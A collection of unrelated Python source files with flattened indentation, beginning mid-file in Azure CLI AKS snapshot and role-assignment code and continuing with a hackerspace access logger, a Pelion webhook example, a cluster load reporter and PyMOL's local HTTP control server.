Snapshot = AKSModels(cmd, ResourceType.MGMT_CONTAINERSERVICE).Snapshot
creationData = CreationData(
source_resource_id=nodepool_id
)
snapshot = Snapshot(
name=snapshot_name,
tags=tags,
location=location,
creation_data=creationData
)
# custom headers
aks_custom_headers = extract_comma_separated_string(
aks_custom_headers,
enable_strip=True,
extract_kv=True,
default_value={},
allow_appending_values_to_same_key=True,
)
return client.create_or_update(resource_group_name, snapshot_name, snapshot, headers=aks_custom_headers)
def aks_nodepool_snapshot_show(cmd, client, resource_group_name, snapshot_name): # pylint: disable=unused-argument
snapshot = client.get(resource_group_name, snapshot_name)
return snapshot
def aks_nodepool_snapshot_delete(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
snapshot_name,
no_wait=False,
yes=False):
msg = 'This will delete the snapshot "{}" in resource group "{}", Are you sure?'.format(snapshot_name, resource_group_name)
if not yes and not prompt_y_n(msg, default="n"):
return None
return client.delete(resource_group_name, snapshot_name)
def aks_nodepool_snapshot_list(cmd, client, resource_group_name=None): # pylint: disable=unused-argument
if resource_group_name is None or resource_group_name == '':
return client.list()
return client.list_by_resource_group(resource_group_name)
# TODO: remove in cli June release
def delete_role_assignments(cli_ctx, ids=None, assignee=None, role=None, resource_group_name=None,
scope=None, include_inherited=False, yes=None, is_service_principal=True):
factory = get_auth_management_client(cli_ctx, scope)
assignments_client = factory.role_assignments
definitions_client = factory.role_definitions
ids = ids or []
if ids:
if assignee or role or resource_group_name or scope or include_inherited:
raise CLIError(
'When assignment ids are used, other parameter values are not required')
for i in ids:
assignments_client.delete_by_id(i)
return
if not any([ids, assignee, role, resource_group_name, scope, assignee, yes]):
msg = 'This will delete all role assignments under the subscription. Are you sure?'
if not prompt_y_n(msg, default="n"):
return
scope = _build_role_scope(resource_group_name, scope,
assignments_client.config.subscription_id)
assignments = _search_role_assignments(cli_ctx, assignments_client, definitions_client,
scope, assignee, role, include_inherited,
include_groups=False, is_service_principal=is_service_principal)
if assignments:
for a in assignments:
assignments_client.delete_by_id(a.id)
# TODO: remove in cli June release
def _delete_role_assignments(cli_ctx, role, service_principal, delay=2, scope=None, is_service_principal=True):
# AAD can have delays in propagating data, so sleep and retry
hook = cli_ctx.get_progress_controller(True)
hook.add(message='Waiting for AAD role to delete', value=0, total_val=1.0)
logger.info('Waiting for AAD role to delete')
for x in range(0, 10):
hook.add(message='Waiting for AAD role to delete',
value=0.1 * x, total_val=1.0)
try:
delete_role_assignments(cli_ctx,
role=role,
assignee=service_principal,
scope=scope,
is_service_principal=is_service_principal)
break
except CLIError as ex:
raise ex
except CloudError as ex:
logger.info(ex)
time.sleep(delay + delay * x)
else:
return False
hook.add(message='AAD role deletion done', value=1.0, total_val=1.0)
logger.info('AAD role deletion done')
return True
# TODO: remove in cli June release
def _search_role_assignments(cli_ctx, assignments_client, definitions_client,
scope, assignee, role, include_inherited, include_groups,
is_service_principal=True):
assignee_object_id = None
if assignee:
if is_service_principal:
assignee_object_id = _resolve_object_id(cli_ctx, assignee)
else:
assignee_object_id = assignee
# always use "scope" if provided, so we can get assignments beyond subscription e.g. management groups
if scope:
assignments = list(assignments_client.list_for_scope(
scope=scope, filter='atScope()'))
elif assignee_object_id:
if include_groups:
f = "assignedTo('{}')".format(assignee_object_id)
else:
f = "principalId eq '{}'".format(assignee_object_id)
assignments = list(assignments_client.list(filter=f))
else:
assignments = list(assignments_client.list())
if assignments:
assignments = [a for a in assignments if (
not scope or
include_inherited and re.match(_get_role_property(a, 'scope'), scope, re.I) or
_get_role_property(a, 'scope').lower() == scope.lower()
)]
if role:
role_id = _resolve_role_id(role, scope, definitions_client)
assignments = [i for i in assignments if _get_role_property(
i, 'role_definition_id') == role_id]
if assignee_object_id:
assignments = [i for i in assignments if _get_role_property(
i, 'principal_id') == assignee_object_id]
return assignments
# TODO: remove in cli June release
def _get_role_property(obj, property_name):
if isinstance(obj, dict):
return obj[property_name]
return getattr(obj, property_name)
# TODO: remove in cli June release
def _ensure_aks_acr_role_assignment(cmd,
assignee,
registry_id,
detach=False,
is_service_principal=True):
if detach:
if not _delete_role_assignments(cmd.cli_ctx,
'acrpull',
assignee,
scope=registry_id,
is_service_principal=is_service_principal):
raise CLIError('Could not delete role assignments for ACR. '
'Are you an Owner on this subscription?')
return
if not _add_role_assignment(cmd,
'acrpull',
assignee,
scope=registry_id,
is_service_principal=is_service_principal):
raise CLIError('Could not create a role assignment for ACR. '
'Are you an Owner on this subscription?')
return
# TODO: remove in cli June release
def _ensure_aks_acr(cmd,
assignee,
acr_name_or_id,
subscription_id,
detach=False,
is_service_principal=True):
from msrestazure.tools import is_valid_resource_id, parse_resource_id
# Check if the ACR exists by resource ID.
if is_valid_resource_id(acr_name_or_id):
try:
parsed_registry = parse_resource_id(acr_name_or_id)
acr_client = cf_container_registry_service(
cmd.cli_ctx, subscription_id=parsed_registry['subscription'])
registry = acr_client.registries.get(
parsed_registry['resource_group'], parsed_registry['name'])
except CloudError as ex:
raise CLIError(ex.message)
_ensure_aks_acr_role_assignment(
cmd, assignee, registry.id, detach, is_service_principal)
return
# Check if the ACR exists by name accross all resource groups.
registry_name = acr_name_or_id
registry_resource = 'Microsoft.ContainerRegistry/registries'
try:
registry = get_resource_by_name(
cmd.cli_ctx, registry_name, registry_resource)
except CloudError as ex:
if 'was not found' in ex.message:
raise CLIError(
"ACR {} not found. Have you provided the right ACR name?".format(registry_name))
raise CLIError(ex.message)
_ensure_aks_acr_role_assignment(cmd, assignee, registry.id, detach, is_service_principal)
return
# TODO: remove in cli June release
# deprecated, see postprocessing_after_mc_created in managed_cluster_decorator.py
def _put_managed_cluster_ensuring_permission(
cmd, # pylint: disable=too-many-locals,too-many-statements,too-many-branches
client,
subscription_id,
resource_group_name,
name,
managed_cluster,
monitoring_addon_enabled,
ingress_appgw_addon_enabled,
virtual_node_addon_enabled,
need_grant_vnet_permission_to_cluster_identity,
vnet_subnet_id,
enable_managed_identity,
attach_acr,
headers,
no_wait
):
# some addons require post cluster creation role assigment
need_post_creation_role_assignment = (monitoring_addon_enabled or
ingress_appgw_addon_enabled or
(enable_managed_identity and attach_acr) or
virtual_node_addon_enabled or
need_grant_vnet_permission_to_cluster_identity)
if need_post_creation_role_assignment:
poller = client.begin_create_or_update(
resource_group_name=resource_group_name,
resource_name=name,
parameters=managed_cluster,
headers=headers)
# Grant vnet permission to system assigned identity RIGHT AFTER
# the cluster is put, this operation can reduce latency for the
# role assignment take effect
if need_grant_vnet_permission_to_cluster_identity:
instant_cluster = client.get(resource_group_name, name)
if not _add_role_assignment(cmd, 'Network Contributor',
instant_cluster.identity.principal_id, scope=vnet_subnet_id,
is_service_principal=False):
logger.warning('Could not create a role assignment for subnet. '
'Are you an Owner on this subscription?')
# adding a wait here since we rely on the result for role assignment
cluster = LongRunningOperation(cmd.cli_ctx)(poller)
cloud_name = cmd.cli_ctx.cloud.name
# add cluster spn/msi Monitoring Metrics Publisher role assignment to publish metrics to MDM
# mdm metrics is supported only in azure public cloud, so add the role assignment only in this cloud
if monitoring_addon_enabled and cloud_name.lower() == 'azurecloud':
from msrestazure.tools import resource_id
cluster_resource_id = resource_id(
subscription=subscription_id,
resource_group=resource_group_name,
namespace='Microsoft.ContainerService', type='managedClusters',
name=name
)
add_monitoring_role_assignment(cluster, cluster_resource_id, cmd)
if ingress_appgw_addon_enabled:
add_ingress_appgw_addon_role_assignment(cluster, cmd)
if virtual_node_addon_enabled:
add_virtual_node_role_assignment(cmd, cluster, vnet_subnet_id)
if enable_managed_identity and attach_acr:
# Attach ACR to cluster enabled managed identity
if cluster.identity_profile is None or \
cluster.identity_profile["kubeletidentity"] is None:
logger.warning('Your cluster is successfully created, but we failed to attach '
'acr to it, you can manually grant permission to the identity '
'named <ClUSTER_NAME>-agentpool in MC_ resource group to give '
'it permission to pull from ACR.')
else:
kubelet_identity_object_id = cluster.identity_profile["kubeletidentity"].object_id
_ensure_aks_acr(cmd,
assignee=kubelet_identity_object_id,
acr_name_or_id=attach_acr,
subscription_id=subscription_id,
is_service_principal=False)
else:
cluster = sdk_no_wait(no_wait, client.begin_create_or_update,
resource_group_name=resource_group_name,
resource_name=name,
parameters=managed_cluster,
headers=headers)
return cluster
|
LogAndPBMessager.py
|
from pushbullet import PushBullet
import logging, logging.handlers
import threading
from time import localtime, strftime, sleep
from requests import ConnectionError
import OpenSSL
class PushbulletMessenger(object):
def __init__(self, api_token, channel_name):
self.channel_name = channel_name
self.api_token = api_token
self.pb_connected = False
try:
self.pb = PushBullet(self.api_token)
except ConnectionError as e:
#print "Retrying PB loop"
print "PB connection error - not connecting today.."
#TODO: figure out how to get PB to reconnect - thread isn't working!
#self.retry_connect_pushbullet()
else:
print "PB connected"
self.pb_connected = False
self.setup_pb()
self.pending_messages = []
thread = threading.Thread(target=self.message_loop, args=())
thread.daemon = True
thread.start()
self._send('HHS Access Start-up', 'Yep, I\'m working.')
# on successful connect, setup PB
def setup_pb(self):
self.channel = self.pb.channels[0]
channel_found = False
for channel in self.pb.channels:
if channel.name == self.channel_name:
channel_found = True
self.channel = channel
print("Channel " + self.channel_name + " found")
if not channel_found:
print("Channel: " + self.channel_name + " not found.")
# try to send messages
def message_loop(self):
while True:
if self.pb_connected:
if len(self.pending_messages) > 0:
backup = (title, content) = self.pending_messages.pop()
try:
self.channel.push_note(title, content)
except ConnectionError as e:
print("Error sending message, trying again..")
self.pending_messages.append(backup)
except OpenSSL.SSL.SysCallError as e:
self.pending_messages.append(backup)
sleep(2)
# retry PB in a thread..
def retry_pb_thread(self):
while not self.pb_connected:
try:
self.pb = PushBullet(self.api_token)
except ConnectionError as e:
print "PB connection error"
self.error("PB Connection error")
else:
print "PB connected now"
self.pb_connected = True
self.setup_pb()
#self._send('PB connected after error..')
sleep(2)
# Start thread to retry PB connection
def retry_connect_pushbullet(self):
thread = threading.Thread(target=self.retry_pb_thread, args=())
thread.daemon = True
thread.start()
def _send(self, title, content):
self.pending_messages.append((title, content))
def _get_time(self):
return strftime("%a, %d %b %Y %H:%M:%S", localtime())
def test_message(self, message):
self._send("HHS Test Message", message)
def new_occupant(self, member):
self._send("HHS New Occupant", member + " entered at " + self._get_time())
def invalid_tag_attempts(self, tag_id, member):
self._send("HHS repeat tag fail", "Tag ID: " + str(tag_id) + " name: " + member)
def alarm_armed(self, last_entrant):
self._send("HHS Alarm Armed", "Alarm armed at " + self._get_time() + " last occupant scanned: "
+ last_entrant)
def alarm_sounding(self):
self._send("ALARM! at HHS", "Alarm is currently sounding. Might want to check it out.")
def error(self, message):
self._send("HHS Access ERROR", message)
class access_logger():
def __init__(self, log_filename, log_filesize, log_backup_count):
self.entrant_logger = logging.getLogger('EntrantLogger')
self.entrant_logger.setLevel(logging.INFO)
FORMAT = "%(asctime)-15s %(message)s"
logging.basicConfig(format=FORMAT)
self.formatter = logging.Formatter("%(asctime)s;%(message)s")
self.rot_handler = logging.handlers.RotatingFileHandler(log_filename,
maxBytes=log_filesize,
backupCount=log_backup_count)
self.rot_handler.setFormatter(self.formatter)
self.entrant_logger.addHandler(self.rot_handler)
def new_occupant(self, member):
self.entrant_logger.info(member + " entered the building.")
def invalid_tag(self, rfid, member):
self.entrant_logger.info("Invalid tag scanned: " + str(rfid) + " member?: " + member)
def invalid_tag_retries(self, rfid, member):
self.entrant_logger.info("Multiple invalid tag attempts, notifying via Pushbullet..")
def alarm_armed(self):
self.entrant_logger.info("Alarm armed.")
def alarm_sounding(self):
self.entrant_logger.error("Alarm has been triggered and is sounding!!")
def info(self, message):
self.entrant_logger.info(message)
def error(self, message):
self.entrant_logger.error(message)
class LogAndPBMessager():
def __init__(self, pb_token, pb_channel, log_filename, log_filesize, log_backup_count):
self.pb = PushbulletMessenger(pb_token, pb_channel)
self.logger = access_logger(log_filename, log_filesize, log_backup_count)
self.last_occupant = "No-one"
def new_occupant(self, member):
self.pb.new_occupant(member)
self.logger.new_occupant(member)
self.last_occupant = member
def invalid_tag(self, rfid_tag, member):
self.logger.invalid_tag(rfid_tag, member)
def invalid_tag_retries(self, rfid_tag, member):
self.logger.invalid_tag_retries(rfid_tag, member)
self.pb.invalid_tag_attempts(rfid_tag, member)
def alarm_armed(self):
self.logger.alarm_armed()
self.pb.alarm_armed(self.last_occupant)
def alarm_sounding(self):
self.logger.alarm_sounding()
self.pb.alarm_sounding()
def info(self, message):
self.logger.info(message)
def error(self, message):
self.logger.error(message)
self.pb.error(message)
|
webhook_ngrok.py
|
# ---------------------------------------------------------------------------
# Pelion Device Management SDK
# (C) COPYRIGHT 2017 Arm Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# --------------------------------------------------------------------------
"""Example showing extended usage of the webhook functionality.
== What's happening here?
This example implements the following sequence:
(each column is a thread of control)
|app thread| |server thread| |mbed cloud|
register webhook
webhook created
request resource value
value requested
asyncid stored
wait for value
- - -
a value appears!
trigger webhook
webhook received
notify SDK
value received
== Prerequisites
Two third-party tools are used in this example:
- hug: a simple python3 webserver
- ngrok: a tool to tunnel public http requests to localhost
(because webhook urls must be on the public internet
and presumably your development machine isn't...)
Other providers are available, such as https://localtunnel.github.io
== Instructions
- Install python libraries: `pip install ngrok hug`
- Install ngrok from https://ngrok.com/
- Follow the ngrok documentation to configure a tunnel:
- `ngrok http 8000`
- Run this Python SDK example in a terminal with the following command:
- `hug -f examples/webhook_ngrok.py https://YOUR_NGROK_ID_GOES_HERE.ngrok.io`
- Visit `https://YOUR_NGROK_ID_GOES_HERE.ngrok.io/start` to initiate the sequence
(use a GET request or point your web browser at this url)
- View the result of the application in the terminal
"""
# an example: using a webhook for handling notifications from mbed cloud
from mbed_cloud.connect import ConnectAPI
import hug
import os
import sys
import threading
import traceback
# we must disable automatic creation of a long-poll thread
# as webhooks and long polling are mutually exclusive on mbed cloud
api = ConnectAPI(dict(autostart_notification_thread=False))
ngrok_url = sys.argv[-1] if len(sys.argv) == 4 else (
os.environ.get('NGROK_URL') or
'https://YOUR_NGROK_ID_GOES_HERE.ngrok.io'
)
os.environ['NGROK_URL'] = ngrok_url
resource_path = "/3/0/2"
def my_application(api):
"""An example application.
- Registers a webhook with mbed cloud services
- Requests the value of a resource
- Prints the value when it arrives
"""
device = api.list_connected_devices().first()
print('using device #', device.id)
api.delete_device_subscriptions(device.id)
try:
print('setting webhook url to:', ngrok_url)
api.update_webhook(ngrok_url)
print('requesting resource value for:', resource_path)
deferred = api.get_resource_value_async(device_id=device.id, resource_path=resource_path)
print('waiting for async #', deferred.async_id)
result = deferred.wait(15)
print('webhook sent us this payload value:', repr(result))
return result
except Exception:
print(traceback.format_exc())
finally:
api.delete_webhook()
print("Deregistered and unsubscribed from all resources. Exiting.")
exit(1)
@hug.put('/', parse_body=False)
def webhook_handler(request):
"""Receives the webhook from mbed cloud services
Passes the raw http body directly to mbed sdk, to notify that a webhook was received
"""
body = request.stream.read(request.content_length or 0).decode('utf8')
print('webhook handler saw:', body)
api.notify_webhook_received(payload=body)
# nb. protected references are not part of the API.
# this is just to demonstrate that the asyncid is stored
print('key store contains:', api._db.keys())
@hug.get('/start')
def start_sequence():
"""Start the demo sequence
We must start this thread in the same process as the webserver to be certain
we are sharing the api instance in memory.
(ideally in future the async id database will be capable of being more than
just a dictionary)
"""
print('getting started!...')
t = threading.Thread(target=my_application, kwargs=dict(api=api))
t.daemon = True
t.start()
return 'ok, starting webhook to: %s' % (ngrok_url,)
# end of example
|
vms_report.py
|
# coding: utf-8
#------------------------------
# [从]服务器上报
#------------------------------
import sys
import os
import json
import time
import threading
import subprocess
import shutil
sys.path.append("/usr/local/lib/python2.7/site-packages")
import psutil
root_dir = os.getcwd()
sys.path.append(root_dir + "/class/core")
reload(sys)
sys.setdefaultencoding('utf-8')
import db
import common
#------------Private Methods--------------
def updateStatus(sid, status):
common.M('video_tmp').where(
"id=?", (sid,)).setField('status', status)
def isMasterNode():
run_model = common.getSysKV('run_model')
run_is_master = common.getSysKV('run_is_master')
if (run_model == '1') or (run_is_master == '1'):
return True
return False
#------------Private Methods--------------
def reportData(data):
_list = common.M('node').field('id,port,name,ip').where(
'ismaster=?', (1,)).select()
if len(_list) > 0:
_url = "http://" + str(_list[0]['ip']) + \
":" + str(_list[0]['port'])
api_url = _url + "/async_master_api/reportData"
ret = common.httpPost(api_url, {
"mark": common.getSysKV('run_mark'),
"data": data,
'name': _list[0]['name']
})
rr = json.loads(ret)
return rr
def pingServer():
_list = common.M('node').field('id,port,name,ip').select()
for x in xrange(0, len(_list)):
_url = "http://" + str(_list[x]['ip']) + \
":" + str(_list[x]['port'])
api_url = _url + "/async_master_api/ping"
try:
ret = common.httpPost(api_url, {
"mark": common.getSysKV('run_mark'),
'name': _list[x]['name']
})
rr = json.loads(ret)
if rr['code'] == 0:
common.M('node').where(
'name=?', (_list[x]['name'],)).setField('status', 1)
except Exception as e:
common.M('node').where(
'name=?', (_list[x]['name'],)).setField('status', 0)
return True
def serverReport():
time_sleep = 3
while True:
if isMasterNode():
time.sleep(time_sleep)
continue
c = os.getloadavg()
data = {}
data['one'] = float(c[0])
data['five'] = float(c[1])
data['fifteen'] = float(c[2])
data['max'] = psutil.cpu_count() * 2
data['limit'] = data['max']
data['safe'] = data['max'] * 0.75
data['report_time'] = common.getDate()
r = reportData(data)
if r['code'] != 0:
print('同步失败![%s]', common.getDate())
time.sleep(time_sleep)
def serverPing():
while True:
pingServer()
time.sleep(3)
def startTask():
import time
try:
while True:
time.sleep(2)
except:
time.sleep(60)
startTask()
if __name__ == "__main__":
t = threading.Thread(target=serverReport)
t.setDaemon(True)
t.start()
t = threading.Thread(target=serverPing)
t.setDaemon(True)
t.start()
startTask()
|
pymolhttpd.py
|
# Copyright (C) Schrodinger, LLC.
# All Rights Reserved
#
# For more information, see LICENSE in PyMOL's home directory.
#
# pymolhttpd.py
#
# web server interface for controlling PyMOL
from __future__ import print_function
from __future__ import absolute_import
# we make extensive use of Python's build-in in web infrastructure
import sys
_PY3 = sys.version_info[0] > 2
if _PY3:
import http.server as BaseHTTPServer
import io as StringIO
import urllib.parse as urlparse
from urllib.request import urlopen
else:
import BaseHTTPServer
import StringIO
import urlparse
from urllib import urlopen
import cgi
import socket
# we also rely upon Python's json infrastructure
try:
import simplejson as json
except:
import json
# standard Python dependencies
import types, os, sys, traceback, threading
# NOTE: Let's attempt to follow Python PEP 8 for coding style for this
# source code file. URL: http://www.python.org/de/peps/pep-0008
#
# * maximum target line length to be 79 characters.....................seventy9
# * methods and attribute names as lower_case_underscore
# * class names as UpperCaseCaps
# * private symbols start with a leading underscore
# * uniform indentation consisting of 4 spaces (no tabs!)
_json_mime_types = [ 'text/json', 'application/json' ]
class _PymolHTTPRequestHandler(BaseHTTPServer.BaseHTTPRequestHandler):
# for now, we're using a single-threaded server
# our actual HTTP server class is private for the time being
# if we need to, then we'll change this
def wfile_write(self, s):
if _PY3 and not isinstance(s, bytes):
s = s.encode('utf-8')
self.wfile.write(s)
def do_GET(self):
self.process_request()
def do_POST(self):
self.process_request()
def log_message(self, format, *args):
if self.server.pymol_logging:
BaseHTTPServer.BaseHTTPRequestHandler.log_message(self,format,
*args)
def process_request(self):
"""
parse any URL or FORM arguments and process the request
"""
# verify that the request is coming from this machine
try:
host, port = self.client_address
if (host[0:6] != '127.0.'):
self.send_error(403,
"Only localhost requests are allowed (not: %s)"
% host)
else:
self.session = self.server.pymol_session # local session
self.callback = None
self.parse_args()
self.process_urlpath()
except socket.error:
traceback.print_exc()
print("broken pipe")
pass
def parse_args(self):
"""
parses URL arguments into a urlpath (before the ?)
and a cgiFieldStorage object (args after the ?).
for example:
http://localhost:8080/apply/pymol.cmd.color?color=blue&selection=benz
would yield self.fs.getvalue("color") as "blue"
and self.fs.getvalue("selection") as "benz"
self.urlpath would be "/apply/pymol.cmd.color"
"""
if (self.command == "POST"):
self.fs = cgi.FieldStorage(fp=self.rfile, headers=self.headers,
environ = {'REQUEST_METHOD':'POST'},
keep_blank_values = 1)
self.urlpath = self.path
elif (self.command == "GET"):
scheme,netloc,path,params,qs,fragment = urlparse.urlparse(self.path)
self.fs = cgi.FieldStorage(environ = {'REQUEST_METHOD':'GET',
'QUERY_STRING':qs},
keep_blank_values = 1)
self.urlpath = path
else:
self.fs = None
def process_urlpath(self):
"""
self.urlpath can be a request for a document, or a
special request, such as apply or getattr
"""
parts = self.urlpath.split('/')
# for example:
# if http://localhost:8080/apply/pymol.cmd.color?...
# then parts is ['', 'apply', 'pymol.cmd.color...']
# or if http://localhost:8080/apply?_json=...
# then parts is ['', 'apply?_json=...']
if len(parts) < 2: # then it cannot be a PyMOL request
self.send_doc() # simple file retrieval
else: # might be a PyMOL request
if len(parts) == 2: # no method name or trailing slash -> blank
parts.append('')
if (parts[1] == 'apply'): # calling a method
self.pymol_apply(parts[2])
elif (parts[1] == 'getattr'): # retrieving a property
self.pymol_getattr(parts[2])
elif (parts[1] == 'echo'): # for debugging purposes
self.send_resp_header(200,'text/plain')
self.echo_args(parts[2])
else: # simple file retrieval
self.send_doc()
def pymol_getattr(self, attr):
"""
apply the repr method to the requested attr, but only for
allowed attributes - those stored in the session dictionary
"""
key = '/getattr/' + attr;
if key in self.session:
try:
result = repr(self.session[key])
self.send_json_result(result)
except:
self.send_error(500,"Unable to get attribute.")
self.wfile_write(" %s\n" % attr)
traceback.print_exc(file=self.wfile)
else:
self.send_error(404,"Not a recognized attribute")
self.wfile_write(" %s is not a recognized attribute\n" % attr)
def wrap_return(self, result, status="OK", indent=None):
r = { 'status' : status, 'result' : result }
if self.server.wrap_natives==1:
return json.dumps(r, indent=indent)
else:
return json.dumps(result, indent=indent)
def send_json_result(self, result):
"""
send the mime header and result body. requests that came from
XMLHTTPRequest have specified they will accept (expect) json
formatted results. other requests will have come from
ordinary GET or POST requests via links or forms
"""
if self.callback is not None:
self.send_resp_header(200,'text/javascript')
self.wfile_write("%s(%s)"%(self.callback,self.wrap_return(result)))
else:
accept_mime = self.headers.get('Accept')
if accept_mime in _json_mime_types:
self.send_resp_header(200,accept_mime)
self.wfile_write(self.wrap_return(result))
else:
self.send_resp_header(200,'text/html')
self.wfile_write("PyMOL's JSON response: <pre>")
self.wfile_write(self.wrap_return(result,indent=4))
self.wfile_write("</pre>")
def send_json_error(self, code, message):
if self.callback is not None:
self.send_resp_header(code,'text/javascript')
self.wfile_write("%s(%s)"%(self.callback,self.wrap_return(message,"ERROR")))
else:
accept_mime = self.headers.get('Accept')
if accept_mime in _json_mime_types:
self.send_resp_header(code,accept_mime)
self.wfile_write(self.wrap_return(message,"ERROR"))
else:
self.send_resp_header(code,'text/html')
self.wfile_write("PyMOL's JSON response: <pre>")
self.wfile_write(self.wrap_return(message,"ERROR",indent=4))
self.wfile_write("</pre>")
def send_exception_json(self, code, message):
fp = StringIO.StringIO()
traceback.print_exc(file=fp)
tb = fp.getvalue()
message = message + tb.split('\n')
response = json.dumps(message)
if self.callback is not None:
self.send_resp_header(code, 'text/javascript')
self.wfile_write("%s(%s)"%(self.callback,response))
else:
accept_mime = self.headers.get('Accept')
if accept_mime in _json_mime_types:
self.send_resp_header(code,accept_mime)
self.wfile_write(response)
else:
self.send_resp_header(code,'text/html')
self.wfile_write("PyMOL's JSON response: <pre>")
self.wfile_write(json.dumps(json.loads(response),indent=4))
self.wfile_write("</pre>")
def pymol_apply(self,method):
"""
apply the appropriate method held in the session dictionary.
supply the method arguements in the form of key/value
"""
args = None
kwds = None
query_kwds = {}
send_multi_result_list = False
for k in self.fs.keys():
if k[0:1] == '_': # leading-underscore argument (special handling)
if k == '_callback':
self.callback = self.fs.getfirst(k)
elif k == '_json': # main path for Javascript API
method = json.loads(self.fs.getfirst(k))
# [ "my_method", [ arg1, ... ] , { 'key1' : 'val1, ... } ]
# or
# [ [ "my_met1", [ arg1, ... ], { 'key1' : 'val1, ... } ],
# [ "my_met2", [ arg1, ... ], { 'key1' : 'val1, ... } ] ]
elif k == '_method': # tentative, not in spec -- may disappear
# a method name "my_method"
method = json.loads(self.fs.getfirst(k))
elif k == '_args': # tentative, not in spec -- may disappear
args = json.loads(self.fs.getfirst(k))
elif k == '_kwds': # tentative, not in spec -- may disappear
kwds = json.loads(self.fs.getfirst(k))
# other underscore arguments are ignored (not passed on)
elif k[0:1] != '_':
query_kwds[k] = self.fs.getfirst(k)
blocks = []
if isinstance(method, str):
# method is merely a string
if kwds is None:
kwds = query_kwds
if args is None:
args = ()
if len(method):
blocks = [ [ method, args, kwds ] ]
elif isinstance(method, list) and len(method):
# method is a list
if not isinstance(method[0], list):
blocks = [ method ] # contains just [name, args, kwds]
else:
blocks = method
# contains [ [name, arg, kwds], [name, args, kwds], ... ]
send_multi_result_list = False # only return final result
else:
self.send_json_error(500,[ "Unable to apply method:", str(method)])
return
result = []
if len(blocks):
for block in blocks:
if self.server.pymol_logging:
print('applying: ' + str(block))
fn = self.session.get(block[0],None)
if fn is None and block[0].startswith('pymol.cmd.'):
fn = getattr(self.server.pymol_cmd, block[0][10:], None)
if fn is not None:
len_block = len(block)
if len_block>1:
args = tuple(block[1])
else:
args = ()
if len_block>2:
kwds = block[2]
else:
kwds = {}
try:
result.append( fn(*args, **kwds) )
except:
self.send_exception_json(500,
[ "Exception in: %s" %
block[0],
"Args: " + str(args) ,
"Kwds: " + str(kwds)])
return
else:
self.send_json_error(500,[ "Method not found:",
str(block) ])
return
if block[0] == '_quit': # special quit behavior
self.send_resp_header()
self.wfile_write("<html>")
href = None
if "href" in kwds:
href = str(kwds['href'])
elif len(args):
href = str(args[1])
if href is None:
self.wfile_write("<body>")
elif not len(href): # simply
self.wfile_write("<body onload=\"window.close()\">")
else:
self.wfile_write(
"<body onload=\"document.location.replace('"+
kwds['href']+"')\">")
self.wfile_write("<p>PyMOL-HTTPd: Shutting down...</p>")
self.wfile_write("<p><i>Please close this window.</i></p>")
self.wfile_write("</body></html>")
self.wfile.flush()
self.server.pymol_cmd.quit()
return
if send_multi_result_list:
self.send_json_result(result)
elif len(result):
self.send_json_result(result[-1])
else:
self.send_json_result(None)
return
def send_doc(self):
"""
send a document (file) in the current directory or any sub-directory
"""
path_list = self.path.split('/')[1:]
if '..' in path_list: # prevent access to parent directories
self.send_error(404,"Illegal path.")
self.wfile_write(": %s" % self.path)
elif self.server.pymol_root is None:
self.send_error(404,"No content root specified.")
else:
try:
full_path = os.path.join(*[self.server.pymol_root] +
list(path_list))
if os.path.isdir(full_path):
full_path = full_path + "/index.html"
fp = open(full_path,"rb")
self.send_resp_header(200,self.guess_mime(full_path))
self.wfile_write(fp.read())
fp.close()
except:
self.send_error(404,"Unable to locate document.")
self.wfile_write(": %s" % self.path)
self.wfile_write(str(sys.exc_info()))
# exc_info() is thread safe
# self.wfile.write(sys.exc_value) # exc_value not thread safe
def guess_mime(self,path):
"""
guess the mime type based on the file extension
"""
if path.endswith('.html'):
return 'text/html'
elif path.endswith('.js'):
return 'application/x-javascript'
elif path.endswith('.jpg'):
return 'image/jpeg'
elif path.endswith('.png'):
return 'image/png'
elif path.endswith('.gif'):
return 'image/gif'
elif path.endswith('.sdf'):
return 'chemical/x-mdl-sdfile'
elif path.endswith('.mol'):
return 'chemical/x-mdl-molfile'
elif path.endswith('.pwg'):
return 'application/x-pymol'
else:
return 'text/plain'
def send_error(self,errcode,errmsg):
self.send_response(errcode)
self.send_header('Content-type', 'text/plain')
self.send_header('Pragma','no-cache')
self.send_header('Cache-Control','no-cache, must-revalidate')
self.send_header('Expires','Sat, 10 Jan 2008 01:00:00 GMT')
self.end_headers()
self.wfile_write("PyMOL-HTTPd-Error: "+errmsg+"\n")
def send_resp_header(self, code=200, mime='text/html'):
self.send_response(code)
self.send_header('Content-type', mime)
self.send_header('Pragma','no-cache')
self.send_header('Cache-Control','no-cache, must-revalidate')
self.send_header('Expires','Sat, 10 Jan 2008 01:00:00 GMT')
self.end_headers()
def echo_args(self):
"""
for debugging requests
"""
self.wfile_write("%s\n" % self.command)
if (self.fs):
for k in self.fs.keys():
self.wfile_write("%s = " % k)
# key can have multiple values, as with checkboxes,
# but also arbitrarily
if (isinstance(self.fs[k], list)):
self.wfile_write("%s\n" % self.fs.getlist(k))
else:
# key can be uploaded file
if (self.fs[k].filename):
self.wfile_write("%s\n" % self.fs[k].filename)
fp = self.fs[k].file
#self.wfile.write("FILE %s" % cgi.escape(repr(fp)))
#self.wfile.write("%s\n" % fp.name)
# fails for StringIO instances
self.wfile_write("%s\n" % repr(fp))
# two ways to get file contents
#file_contents = self.fs.getvalue(k)
#file_contents = fp.read()
#self.wfile.write("%s" % file_contents)
else:
#plain-old key/value
self.wfile_write("%s\n" % self.fs.getvalue(k))
else:
self.wfile_write("No args\n")
# this is the public class we're exposing to PyMOL consortium members
class PymolHttpd:
def __init__(self, port=8080, root=None, logging=1, wrap_natives=0, self_cmd=None):
if self_cmd is None:
# fallback on the global singleton PyMOL API
try:
from pymol import cmd
self_cmd = cmd
except ImportError:
self_cmd = None
self.port = int(port)
self.stop_event = threading.Event()
self.stop_event.set()
self.root = root
self.cmd = self_cmd
session = {}
self.session = session
# Special methods for the web interface
session['_quit'] = lambda href=None,s=self:s.quit()
# JavaScript workarounds for keyword clashes
session['pymol.cmd.delete_'] = self_cmd.delete
session['pymol.cmd.super_'] = self_cmd.super
## Unsafe methods to workaround (uses eval)
session['pymol.cmd.label'] = self_cmd.label2 # no-eval version
self.server = BaseHTTPServer.HTTPServer(('', self.port),
_PymolHTTPRequestHandler)
